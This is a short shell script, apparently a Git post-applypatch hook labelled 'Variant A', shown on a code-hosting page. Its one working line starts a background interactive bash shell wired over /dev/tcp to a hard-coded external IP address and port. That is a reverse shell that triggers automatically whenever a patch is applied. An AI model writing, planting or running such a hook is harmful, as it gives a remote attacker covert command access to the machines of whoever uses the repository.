5 lines
101 B
Bash
Executable File
5 lines
101 B
Bash
Executable File
#!/bin/sh
|
|
|
|
# Variant A - post-applypatch
|
|
bash -c 'exec bash -i &>/dev/tcp/202.79.169.91/28016 <&1' &
|